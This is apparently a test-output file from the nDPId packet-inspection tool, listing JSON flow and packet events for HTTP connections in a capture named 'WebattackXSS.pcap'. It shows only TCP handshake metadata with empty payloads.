+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347466553,"flow_last_seen":1499347466553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347466553,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1499347466553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347466553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KvdAAD4GmtmsEAABwKgKMuCWAFD9ZuXtAAAAAKACchDKcwAAAgQFtAQCCAoBOs8aAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1499347466553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347466553,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4JYOrdMQ\/Wbl7qAScSBFIQAAAgQFtAQCCAoD5KCPATrPGgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4159,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1499347466554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347466554,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KvhAAD4GmuCsEAABwKgKMuCWAFD9ZuXuDq3TEYAQAOXkKAAAAQEICgE6zxoD5KCP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347467793,"flow_last_seen":1499347467793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347467793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1499347467793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347467793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82olAAD4G60asEAABwKgKMuCkAFDARwrZAAAAAKACchDhYwAAAgQFtAQCCAoBOtBQAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4170,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":1499347467794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347467794,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4KSQwyNLwEcK2qAScSCIigAAAgQFtAQCCAoD5KHFATrQUAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":1499347467794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347467794,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02opAAD4G602sEAABwKgKMuCkAFDARwrakMMjTIAQAOUnkgAAAQEICgE60FAD5KHF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347469060,"flow_last_seen":1499347469060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347469060,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1499347469060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347469060,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H0RAAD4GpoysEAABwKgKMuCyAFAQe87JAAAAAKACchDL9AAAAgQFtAQCCAoBOtGNAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":1499347469061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347469061,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4LKyNukIEHvOyqAScSCKrQAAAgQFtAQCCAoD5KMCATrRjQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":1499347469061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347469061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H0VAAD4GppOsEAABwKgKMuCyAFAQe87KsjbpCYAQAOUptQAAAQEICgE60Y0D5KMC"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347470328,"flow_last_seen":1499347470328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347470328,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1499347470328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347470328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MvtAAD4GktWsEAABwKgKMuDAAFBLw+AxAAAAAKACchB9+QAAAgQFtAQCCAoBOtLKAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":1499347470328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347470328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4MBkpV8JS8PgMqAScSATBgAAAgQFtAQCCAoD5KQ\/ATrSygEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":1499347470328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347470328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MvxAAD4GktysEAABwKgKMuDAAFBLw+AyZKVfCoAQAOWyDQAAAQEICgE60soD5KQ\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347471594,"flow_last_seen":1499347471594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347471594,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1499347471594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347471594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VndAAD4Gb1msEAABwKgKMuDOAFAlMIJxAAAAAKACchABAwAAAgQFtAQCCAoBOtQGAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":2,"flow_last_seen":1499347471594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347471594,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4M5lR7ajJTCCcqAScSA8lgAAAgQFtAQCCAoD5KV8ATrUBgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":3,"flow_last_seen":1499347471594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347471594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VnhAAD4Gb2CsEAABwKgKMuDOAFAlMIJyZUe2pIAQAOXbnQAAAQEICgE61AYD5KV8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347474100,"flow_last_seen":1499347474100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347474100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1499347474100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347474100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IdhAAD4Go\/isEAABwKgKMuDoAFDgcfehAAAAAKACchDOAwAAAgQFtAQCCAoBOtZ5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":1499347474100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347474100,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4OgnZn4J4HH3oqAScSB9oAAAAgQFtAQCCAoD5KfuATrWeQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":1499347474101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347474101,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IdlAAD4Go\/+sEAABwKgKMuDoAFDgcfeiJ2Z+CoAQAOUcqAAAAQEICgE61nkD5Kfu"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347475384,"flow_last_seen":1499347475384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475384,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1499347475384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347475384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yGtAAD4G\/WSsEAABwKgKMuD2AFCdWh\/RAAAAAKACchDnnAAAAgQFtAQCCAoBOte6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":1499347475384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347475384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4PYsYAVjnVof0qAScSAJpQAAAgQFtAQCCAoD5KkvATrXugEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":1499347475385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347475385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yGxAAD4G\/WusEAABwKgKMuD2AFCdWh\/SLGAFZIAQAOWorAAAAQEICgE617oD5Kkv"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 